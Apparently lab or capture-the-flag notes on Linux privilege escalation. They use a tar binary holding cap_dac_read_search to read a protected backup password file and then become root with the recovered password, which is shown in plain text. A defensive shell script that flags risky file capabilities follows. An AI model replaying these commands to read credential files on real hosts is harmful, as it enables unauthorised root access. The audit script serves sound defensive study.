Priv Esc

ls -la
.2uqPEfj3D<P'a-3
getcap -r / 2>/dev/null

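cap_dac_read_search allows us to "Bypass file read permission checks and directory read and execute permission checks", so a binary holding it (here /home/cyber/tar, used below) can read files regardless of their permissions.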

ls -la /var/backups
/home/cyber/tar -cf privme.tar /var/backups/.old_pass.bak
/home/cyber/tar -xf privme.tar
Ts&4&YurgtRX(=~h
su root
Ts&4&YurgtRX(=~h
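
From the defender's side, the same getcap listing can be audited for capabilities like the one used above. The script below is an added example, not part of the original notes; the risky-capability list, the system-directory check and the sample getcap lines are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added audit example: reads `getcap -r /` output on stdin and reports file
# capabilities that bypass normal permission checks.

# Assumed policy list of high-risk capabilities; adjust for your environment.
RISKY_CAPS='cap_dac_read_search cap_dac_override cap_setuid cap_setgid cap_sys_admin cap_sys_ptrace cap_sys_module cap_chown cap_fowner'

# Prints "LEVEL<TAB>path<TAB>matched capabilities" for every risky entry.
# LEVEL is HIGH when the binary lives outside the usual system directories.
flag_risky_caps() {
    awk -v risky="$RISKY_CAPS" '
    BEGIN { n = split(risky, r, " ") }
    NF >= 2 {
        caps = $NF                       # last field holds the capability text
        path = $0
        sub(/[ \t]+[^ \t]+$/, "", path)  # strip the capability field
        sub(/[ \t]+=$/, "", path)        # strip " =" printed by older libcap
        hits = ""
        if (caps ~ /^=/) {
            hits = "ALL"                 # "=ep" grants every capability
        } else {
            for (i = 1; i <= n; i++)
                if (index(caps, r[i])) hits = (hits == "" ? r[i] : hits "," r[i])
        }
        if (hits == "") next
        level = (path ~ /^\/(usr|bin|sbin|lib|lib64)\//) ? "REVIEW" : "HIGH"
        printf "%s\t%s\t%s\n", level, path, hits
    }'
}

# Constructed sample covering the old ("path = caps") and new ("path caps")
# getcap output formats.
sample_getcap_output() {
    cat <<'EOF'
/usr/bin/ping = cap_net_raw+ep
/home/cyber/tar = cap_dac_read_search+ep
/usr/bin/python3.8 cap_setuid,cap_net_bind_service=eip
/opt/tools/dbg =ep
EOF
}

# Demo on the sample; on a real host: getcap -r / 2>/dev/null | flag_risky_caps
sample_getcap_output | flag_risky_caps
```

A HIGH entry such as a capability-bearing copy of tar in a home directory can be cleared with `setcap -r <path>` once confirmed unneeded.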
